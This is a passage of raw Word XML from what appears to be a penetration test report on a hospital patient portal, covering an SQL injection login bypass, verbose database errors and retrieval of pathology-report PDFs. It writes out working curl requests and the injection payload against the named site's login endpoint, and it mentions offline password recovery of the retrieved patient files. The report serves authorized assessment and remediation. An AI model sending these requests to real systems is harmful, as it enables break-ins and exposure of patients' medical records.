      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>search the deployment for additional copies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The known backup URL and common backup extensions must be inaccessible without authenticated administrative authorization; no confidential data may be returned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-03 — SQL injection enabling patient-portal authentication bypass</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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEE2E2"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B91C1C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CRITICAL</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9.8</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CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The patient login endpoint accepted username and password via POST. A baseline invalid credential request returned HTTP 200 with a 2,281-byte response and no redirect. Changing only the username to the controlled value admin' -- - changed the result to HTTP 302 with a Location header pointing to /patient/portal.php. Browser evidence then showed the authenticated patient portal. This differential behavior is the central manual proof.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The application appears to be allowing attacker-controlled syntax to alter the database query used for authentication. The exact unseen source-code statement is not claimed; the evidence supports insufficient query parameterization/input handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Baseline request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>curl -k -sS -o /tmp/a.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin" --data-urlencode "password=wrongpassword123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Observed baseline: status=200, size=2281, redirect empty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Controlled exploit request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>curl -k -sS -o /tmp/b.html -w "status=%{http_code} size=%{size_download} redirect=%{redirect_url}\n" -X POST "https://medirozahospital.com/patient/login.php" --data-urlencode "username=admin' -- -" --data-urlencode "password=wrongpassword123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Observed exploit: status=302, redirect=https://medirozahospital.com/patient/portal.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The decisive property is the state transition. The password remained the same invalid value in both requests; the username field was the only changed control. The resulting authenticated portal was confirmed in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="2973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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2973705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: patient login form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="3133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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: controlled SQLi request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="1882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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="1882140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: HTTP 302 response after controlled input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="3133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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: browser-confirmed portal access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Authentication boundary bypass followed by access to patient reporting functions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The observable control failure is that untrusted authentication input can influence database query behavior. The exact application source code was not available in this black-box assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use parameterized queries/prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>remove string concatenation from authentication queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>use a least-privileged DB account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>implement generic authentication errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>add SQLi regression tests for quote/comment/boolean payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>invalidate sessions after authentication failures and monitor anomalous session creation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Baseline and malicious login inputs must both remain unauthenticated; all malformed inputs must produce a generic failure and no portal redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-04 — Verbose SQL/database error disclosure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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEF3C7"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B45309"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>MEDIUM</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5.3</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CWE-209</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A malformed SQL payload caused the application to return a mysqli_query syntax warning containing database-layer implementation details. The message exposed the database error class and query parsing context. This is separate from F-03 because it represents an error-handling weakness even though it is closely related to the injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Verbose production errors shorten the feedback loop for an attacker by revealing that input reached the database layer and by exposing implementation-specific diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The application returned a mysqli_query syntax warning when supplied malformed SQL syntax. The disclosure confirms that the input reached the database layer and exposes implementation details that should not appear in a production response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5941695" cy="33712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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5941695" cy="3371215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: SQL error / application behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Database implementation details disclosed to the remote requester.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The message exposed the database error class and query parsing context. This is separate from F-03 because it represents an error-handling weakness even though it is closely related to the injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Disable display_errors in production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>return generic errors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>log detailed exceptions server-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>protect log files from web access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>add tests that malformed input never reveals database exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Malformed SQL-like input must not disclose database driver, query syntax, stack trace or implementation details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-05 — Sensitive patient-report retrieval following authentication bypass</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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FFEDD5"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D97706"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>HIGH</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8.1*</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CWE-639</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After authentication bypass, the patient portal displayed three pathology reports. The HTML exposed download.php?id=1, id=2 and id=3. Each request returned HTTP 200 with application/pdf and the captured files were preserved as evidence. The assessment does not claim a standalone cross-patient IDOR because a separate legitimate-patient-to-other-patient authorization test was not performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The security impact is nevertheless demonstrated: bypassing the patient authentication boundary reaches confidential report objects. The documents were subsequently subjected to offline password recovery, proving that application-level access to the files was the key control point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Portal displayed three pathology-report entries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Download endpoints used sequential identifiers 1, 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All three requests returned HTTP 200 application/pdf.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retrieved sizes: 3,657 bytes; 3,611 bytes; 3,735 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="29883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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2988310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: patient portal and report list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
